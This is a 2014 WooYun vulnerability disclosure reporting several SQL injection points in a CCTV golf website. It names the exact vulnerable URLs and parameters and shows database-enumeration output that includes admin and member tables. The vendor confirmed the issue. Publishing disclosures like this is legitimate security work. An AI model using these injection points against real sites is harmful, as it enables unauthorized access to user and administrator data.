当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052439

漏洞标题:中国网络电视台某站点存在多处SQL注射漏洞

相关厂商:中国网络电视台

漏洞作者: HackBraid

提交时间:2014-03-01 17:01

修复时间:2014-04-15 17:01

公开时间:2014-04-15 17:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-01: 细节已通知厂商并且等待厂商处理中
2014-03-04: 厂商已经确认,细节仅向厂商公开
2014-03-14: 细节向核心白帽子及相关领域专家公开
2014-03-24: 细节向普通白帽子公开
2014-04-03: 细节向实习白帽子公开
2014-04-15: 细节向公众公开

简要描述:

SQL注入

详细说明:

站点:
http://golf.cctv.com/ 央视泛高尔夫网
注入点:
http://golf.cctv.com/e/extend/dc_list.php?key=
http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid=
http://golf.cctv.com/e/extend/court/court_detail.php?courtid=131&hole=1#hole_data
POST注入:
http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid= reply=%E5%8F%91%E8%A1%A8%E5%9B%9E%E5%A4%8D&replytext=88952634

漏洞证明:

以http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid=为例:

available databases [5]:
[*] fungolf
[*] information_schema
[*] photo_golf
[*] sgagolf
[*] test


fungolf 320个表,uc, uchome开头的是app数据吧

Database: fungolf
[337 tables]
+---------------------------------+
| course                          |
| customer                        |
| phome_ecms_article              |
| phome_ecms_article_data_1       |
| phome_ecms_article_doc          |
| phome_ecms_article_doc_data     |
| phome_ecms_baoming              |
| phome_ecms_course               |
| phome_ecms_course_data_1        |
| phome_ecms_course_doc           |
| phome_ecms_course_doc_data      |
| phome_ecms_customer             |
| phome_ecms_customer_doc         |
| phome_ecms_customer_doc_data    |
| phome_ecms_download             |
| phome_ecms_download_data_1      |
| phome_ecms_download_doc         |
| phome_ecms_download_doc_data    |
| phome_ecms_educ                 |
| phome_ecms_educ_data_1          |
| phome_ecms_educ_doc             |
| phome_ecms_educ_doc_data        |
| phome_ecms_flash                |
| phome_ecms_flash_data_1         |
| phome_ecms_flash_doc            |
| phome_ecms_flash_doc_data       |
| phome_ecms_golfcourse           |
| phome_ecms_golfcourse_data_1    |
| phome_ecms_golfcourse_doc       |
| phome_ecms_golfcourse_doc_data  |
| phome_ecms_info                 |
| phome_ecms_info_data_1          |
| phome_ecms_info_doc             |
| phome_ecms_info_doc_data        |
| phome_ecms_infoclass_article    |
| phome_ecms_infoclass_course     |
| phome_ecms_infoclass_customer   |
| phome_ecms_infoclass_download   |
| phome_ecms_infoclass_educ       |
| phome_ecms_infoclass_flash      |
| phome_ecms_infoclass_golfcourse |
| phome_ecms_infoclass_info       |
| phome_ecms_infoclass_mark       |
| phome_ecms_infoclass_money      |
| phome_ecms_infoclass_movie      |
| phome_ecms_infoclass_news       |
| phome_ecms_infoclass_photo      |
| phome_ecms_infoclass_player     |
| phome_ecms_infoclass_point      |
| phome_ecms_infoclass_qiuchang   |
| phome_ecms_infoclass_scheduler  |
| phome_ecms_infoclass_shop       |
| phome_ecms_infoclass_teacher    |
| phome_ecms_infoclass_vipmember  |
| phome_ecms_infotmp_article      |
| phome_ecms_infotmp_course       |
| phome_ecms_infotmp_customer     |
| phome_ecms_infotmp_download     |
| phome_ecms_infotmp_educ         |
| phome_ecms_infotmp_flash        |
| phome_ecms_infotmp_golfcourse   |
| phome_ecms_infotmp_info         |
| phome_ecms_infotmp_mark         |
| phome_ecms_infotmp_money        |
| phome_ecms_infotmp_movie        |
| phome_ecms_infotmp_news         |
| phome_ecms_infotmp_photo        |
| phome_ecms_infotmp_player       |
| phome_ecms_infotmp_point        |
| phome_ecms_infotmp_qiuchang     |
| phome_ecms_infotmp_scheduler    |
| phome_ecms_infotmp_shop         |
| phome_ecms_infotmp_teacher      |
| phome_ecms_infotmp_vipmember    |
| phome_ecms_mark                 |
| phome_ecms_mark_data_1          |
| phome_ecms_mark_doc             |
| phome_ecms_mark_doc_data        |
| phome_ecms_money                |
| phome_ecms_money_data_1         |
| phome_ecms_money_doc            |
| phome_ecms_money_doc_data       |
| phome_ecms_movie                |
| phome_ecms_movie_bk             |
| phome_ecms_movie_data_1         |
| phome_ecms_movie_data_1_bk      |
| phome_ecms_movie_doc            |
| phome_ecms_movie_doc_bk         |
| phome_ecms_movie_doc_data       |
| phome_ecms_movie_doc_data_bk    |
| phome_ecms_news                 |
| phome_ecms_news_copy            |
| phome_ecms_news_data_1          |
| phome_ecms_news_doc             |
| phome_ecms_news_doc_data        |
| phome_ecms_photo                |
| phome_ecms_photo_data_1         |
| phome_ecms_photo_doc            |
| phome_ecms_photo_doc_data       |
| phome_ecms_player               |
| phome_ecms_player_data_1        |
| phome_ecms_player_doc           |
| phome_ecms_player_doc_data      |
| phome_ecms_point                |
| phome_ecms_point_data_1         |
| phome_ecms_point_doc            |
| phome_ecms_point_doc_data       |
| phome_ecms_qiuchang_data_1      |
| phome_ecms_qiuchang_doc         |
| phome_ecms_qiuchang_doc_data    |
| phome_ecms_scheduler            |
| phome_ecms_scheduler_data_1     |
| phome_ecms_scheduler_doc        |
| phome_ecms_scheduler_doc_data   |
| phome_ecms_shop                 |
| phome_ecms_shop_data_1          |
| phome_ecms_shop_doc             |
| phome_ecms_shop_doc_data        |
| phome_ecms_teacher              |
| phome_ecms_teacher_data_1       |
| phome_ecms_teacher_doc          |
| phome_ecms_teacher_doc_data     |
| phome_ecms_vipmember            |
| phome_ecms_vipmember_data_1     |
| phome_ecms_vipmember_doc        |
| phome_ecms_vipmember_doc_data   |
| phome_edm                       |
| phome_enewsad                   |
| phome_enewsadclass              |
| phome_enewsadclick              |
| phome_enewsadminstyle           |
| phome_enewsbefrom               |
| phome_enewsbq                   |
| phome_enewsbqclass              |
| phome_enewsbqtemp               |
| phome_enewsbqtempclass          |
| phome_enewsbuybak               |
| phome_enewsbuygroup             |
| phome_enewscard                 |
| phome_enewschecktext            |
| phome_enewsclass                |
| phome_enewsclassadd             |
| phome_enewsclasstemp            |
| phome_enewsclasstempclass       |
| phome_enewsdiggips              |
| phome_enewsdo                   |
| phome_enewsdolog                |
| phome_enewsdownerror            |
| phome_enewsdownrecord           |
| phome_enewsdownurlqz            |
| phome_enewserrorclass           |
| phome_enewsf                    |
| phome_enewsfava                 |
| phome_enewsfavaclass            |
| phome_enewsfeedback             |
| phome_enewsfeedbackclass        |
| phome_enewsfeedbackf            |
| phome_enewsfile                 |
| phome_enewsgbook                |
| phome_enewsgbookclass           |
| phome_enewsgfenip               |
| phome_enewsgroup                |
| phome_enewshy                   |
| phome_enewshyclass              |
| phome_enewsinfoclass            |
| phome_enewsinfotype             |
| phome_enewsinfovote             |
| phome_enewsjstemp               |
| phome_enewsjstempclass          |
| phome_enewskey                  |
| phome_enewslink                 |
| phome_enewslinkclass            |
| phome_enewslinktmp              |
| phome_enewslisttemp             |
| phome_enewslisttempclass        |
| phome_enewslog                  |
| phome_enewsloginfail            |
| phome_enewsmember               |
| phome_enewsmemberadd            |
| phome_enewsmemberf              |
| phome_enewsmemberfeedback       |
| phome_enewsmemberform           |
| phome_enewsmembergbook          |
| phome_enewsmembergroup          |
| phome_enewsmod                  |
| phome_enewsnewstemp             |
| phome_enewsnewstempclass        |
| phome_enewsnotcj                |
| phome_enewspage                 |
| phome_enewspageclass            |
| phome_enewspayapi               |
| phome_enewspayrecord            |
| phome_enewspic                  |
| phome_enewspicclass             |
| phome_enewspl                   |
| phome_enewspl_data_1            |
| phome_enewsplayer               |
| phome_enewsplf                  |
| phome_enewspltemp               |
| phome_enewspostdata             |
| phome_enewspublic               |
| phome_enewspubtemp              |
| phome_enewsqf                   |
| phome_enewsqmsg                 |
| phome_enewssearch               |
| phome_enewssearchall            |
| phome_enewssearchall_load       |
| phome_enewssearchtemp           |
| phome_enewssearchtempclass      |
| phome_enewsshopdd               |
| phome_enewsshoppayfs            |
| phome_enewsshopps               |
| phome_enewsspacestyle           |
| phome_enewssql                  |
| phome_enewstable                |
| phome_enewstask                 |
| phome_enewstempgroup            |
| phome_enewstempvar              |
| phome_enewstempvarclass         |
| phome_enewstogzts               |
| phome_enewsuser                 |
| phome_enewsuserjs               |
| phome_enewsuserlist             |
| phome_enewsvote                 |
| phome_enewsvotemod              |
| phome_enewsvotetemp             |
| phome_enewswapstyle             |
| phome_enewswords                |
| phome_enewswriter               |
| phome_enewszt                   |
| phome_enewsztclass              |
| scheduler                       |
| uc_admins                       |
| uc_applications                 |
| uc_badwords                     |
| uc_domains                      |
| uc_failedlogins                 |
| uc_feeds                        |
| uc_friends                      |
| uc_mailqueue                    |
| uc_memberfields                 |
| uc_members                      |
| uc_mergemembers                 |
| uc_newpm                        |
| uc_notelist                     |
| uc_pms                          |
| uc_protectedmembers             |
| uc_settings                     |
| uc_sqlcache                     |
| uc_tags                         |
| uc_vars                         |
| uchome_ad                       |
| uchome_adminsession             |
| uchome_album                    |
| uchome_app_ask                  |
| uchome_app_ask_reply            |
| uchome_app_brand                |
| uchome_app_brand_player         |
| uchome_app_brand_reply          |
| uchome_app_brand_view           |
| uchome_appcreditlog             |
| uchome_blacklist                |
| uchome_block                    |
| uchome_blog                     |
| uchome_blogfield                |
| uchome_cache                    |
| uchome_class                    |
| uchome_click                    |
| uchome_clickuser                |
| uchome_comment                  |
| uchome_config                   |
| uchome_creditlog                |
| uchome_creditrule               |
| uchome_cron                     |
| uchome_data                     |
| uchome_docomment                |
| uchome_doing                    |
| uchome_event                    |
| uchome_eventclass               |
| uchome_eventfield               |
| uchome_eventinvite              |
| uchome_eventpic                 |
| uchome_feed                     |
| uchome_friend                   |
| uchome_friendguide              |
| uchome_friendlog                |
| uchome_invite                   |
| uchome_log                      |
| uchome_magic                    |
| uchome_magicinlog               |
| uchome_magicstore               |
| uchome_magicuselog              |
| uchome_mailcron                 |
| uchome_mailqueue                |
| uchome_member                   |
| uchome_mtag                     |
| uchome_mtaginvite               |
| uchome_myapp                    |
| uchome_myinvite                 |
| uchome_news_category            |
| uchome_news_detail              |
| uchome_news_responds            |
| uchome_notification             |
| uchome_pic                      |
| uchome_picfield                 |
| uchome_poke                     |
| uchome_poll                     |
| uchome_pollfield                |
| uchome_polloption               |
| uchome_polluser                 |
| uchome_post                     |
| uchome_profield                 |
| uchome_profilefield             |
| uchome_report                   |
| uchome_session                  |
| uchome_show                     |
| uchome_space                    |
| uchome_spacefield               |
| uchome_spaceinfo                |
| uchome_spacelog                 |
| uchome_stat                     |
| uchome_statuser                 |
| uchome_tag                      |
| uchome_tagblog                  |
| uchome_tagspace                 |
| uchome_task                     |
| uchome_thread                   |
| uchome_topic                    |
| uchome_topicuser                |
| uchome_userapp                  |
| uchome_userappfield             |
| uchome_userevent                |
| uchome_usergroup                |
| uchome_userlog                  |
| uchome_usermagic                |
| uchome_usertask                 |
| uchome_visitor                  |
+---------------------------------+

修复方案:

修复!

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-04 23:02

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-03 10:50 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @中国网络电视台 确认确认